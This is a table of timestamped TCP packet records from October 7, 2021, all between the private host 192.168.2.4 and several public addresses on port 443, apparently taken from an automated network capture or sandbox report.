Oct 7, 2021 15:51:46.899905920 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.948744059 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.948832989 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:49.128997087 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.129035950 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.129112959 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.135098934 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.135140896 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.135212898 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.172882080 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.172893047 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.173146963 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.173182964 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.221950054 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.222050905 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.224946976 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.225043058 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.314867020 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.314944983 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.315237999 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.315295935 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.324727058 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.345108986 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.345130920 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.346865892 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.348503113 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.351809978 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.351867914 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.351907969 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.351923943 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.353887081 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.353900909 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.353943110 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.354052067 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.354087114 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.354116917 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.354229927 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:49.355907917 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.355921984 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.355926037 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.355946064 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.358822107 CEST	49790	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:51:49.358844995 CEST	443	49790	104.26.7.139	192.168.2.4
Oct 7, 2021 15:51:51.846512079 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.846551895 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.846669912 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.846893072 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.846930027 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.847048998 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.847084045 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.847197056 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.847238064 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.847239017 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.847273111 CEST	443	49805	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.847348928 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.857497931 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.857537031 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.858382940 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.858411074 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.858576059 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.858613968 CEST	443	49805	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.858619928 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.858643055 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.902854919 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.903197050 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.903661966 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.903812885 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.913876057 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.913990974 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.918673992 CEST	443	49805	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.918817043 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.938399076 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.938420057 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.938811064 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.939038038 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.943435907 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.943460941 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.943882942 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.943949938 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.948030949 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.948213100 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.948257923 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.948645115 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.948687077 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.948704004 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.952291012 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.952322006 CEST	443	49805	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.952657938 CEST	443	49805	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.952900887 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.966177940 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.966268063 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.966279984 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.966296911 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.966367960 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.970707893 CEST	49804	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:51:51.970725060 CEST	443	49804	172.217.168.38	192.168.2.4
Oct 7, 2021 15:51:51.972028971 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.972174883 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:51.972199917 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.972276926 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.982199907 CEST	49806	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:51:51.982223034 CEST	443	49806	172.67.69.19	192.168.2.4
Oct 7, 2021 15:51:52.480870962 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.480925083 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.480981112 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.480981112 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.481117010 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.481136084 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.481868029 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.481901884 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.482832909 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.482865095 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.542243004 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.542299986 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.542385101 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.542423964 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.542435884 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.542512894 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.542768955 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.542993069 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.543435097 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.543474913 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.543698072 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.543724060 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.544836998 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.545084000 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.552277088 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.552309990 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.552715063 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.552737951 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.552766085 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.558868885 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.558887959 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.559227943 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.559303045 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.588144064 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.588258982 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.588282108 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.588332891 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.616022110 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.616178036 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.617342949 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.617500067 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.639734030 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.639765024 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.640053988 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.640122890 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.640666962 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.660255909 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.660341978 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.660370111 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.660404921 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.661097050 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.661123037 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.661405087 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.661557913 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.673785925 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.673835993 CEST	443	49814	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.673973083 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.674175978 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.674211979 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.674283028 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.674666882 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.674686909 CEST	443	49814	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.674889088 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.674963951 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.693507910 CEST	49813	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.693535089 CEST	443	49813	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.695316076 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.717236042 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.717333078 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.717355013 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.717390060 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.717422962 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.717447996 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.724508047 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.724966049 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.727332115 CEST	443	49814	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.727468014 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.729983091 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.730020046 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.730570078 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.730586052 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.730624914 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.730745077 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.732701063 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.732722998 CEST	443	49814	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.733067036 CEST	443	49814	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.733165979 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.741951942 CEST	49811	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:52.741986990 CEST	443	49811	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:52.763556004 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.763715982 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.764230967 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.764251947 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.768348932 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.768841982 CEST	443	49815	35.244.174.68	192.168.2.4
Oct 7, 2021 15:51:52.768855095 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.768912077 CEST	49815	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:51:52.799335003 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.799369097 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.799374104 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.799405098 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.799448967 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.799482107 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.800256014 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.800273895 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.800302029 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.800326109 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.891757965 CEST	49812	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:52.891798973 CEST	443	49812	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:52.950079918 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.950172901 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.956445932 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.956551075 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.971925974 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.971959114 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.972265005 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.972273111 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.972347975 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.972397089 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.978849888 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:52.978895903 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:52.978897095 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:52.978929996 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:52.978979111 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:52.979022026 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:52.979748011 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:52.979777098 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:52.979978085 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:52.980004072 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:52.986040115 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:52.986059904 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.986368895 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:52.986891031 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.017086983 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.017201900 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.017246962 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.017263889 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.045108080 CEST	49820	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.045147896 CEST	443	49820	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.048356056 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.054996967 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.055136919 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.056556940 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.056691885 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.091152906 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.092680931 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.092767954 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.092781067 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.092808962 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.092830896 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.092868090 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.140886068 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.140911102 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.141204119 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.141210079 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.141316891 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.141372919 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.141470909 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.141499996 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.141830921 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.141902924 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.160496950 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.160603046 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.160604954 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.160661936 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.184473038 CEST	49819	443	192.168.2.4	76.223.111.131
Oct 7, 2021 15:51:53.184509993 CEST	443	49819	76.223.111.131	192.168.2.4
Oct 7, 2021 15:51:53.237912893 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.237955093 CEST	443	49822	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.237968922 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.238029003 CEST	49822	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.239579916 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.259031057 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.259094954 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.259356976 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.259388924 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.264878035 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.264918089 CEST	443	49823	18.195.217.206	192.168.2.4
Oct 7, 2021 15:51:53.264930964 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.264991999 CEST	49823	443	192.168.2.4	18.195.217.206
Oct 7, 2021 15:51:53.266530991 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.266587973 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.266690969 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.267431974 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.267468929 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.267554998 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.268330097 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.268361092 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.268551111 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.268579006 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.306471109 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.306478024 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.307329893 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.307379961 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.307957888 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.311414957 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.312484026 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.312511921 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.355153084 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.384506941 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.384588957 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.384700060 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.384721041 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.385267019 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.385307074 CEST	443	49830	18.156.81.187	192.168.2.4
Oct 7, 2021 15:51:53.385330915 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.385371923 CEST	49830	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:51:53.523705006 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:53.556364059 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:53.556478024 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:53.556597948 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:53.556627989 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:53.556884050 CEST	49810	443	192.168.2.4	142.250.203.98
Oct 7, 2021 15:51:53.556911945 CEST	443	49810	142.250.203.98	192.168.2.4
Oct 7, 2021 15:51:53.717406034 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.717448950 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.717637062 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.718637943 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.718707085 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.718868971 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.719985008 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.720030069 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.720588923 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.720619917 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.806318045 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.806528091 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.808211088 CEST	443	49835	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.808485985 CEST	49835	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.814821959 CEST	49836	443	192.168.2.4	18.197.99.6
Oct 7, 2021 15:51:53.814861059 CEST	443	49836	18.197.99.6	192.168.2.4
Oct 7, 2021 15:51:53.815336943 CEST	443	49836	18.197.99.6	192.168.2.4
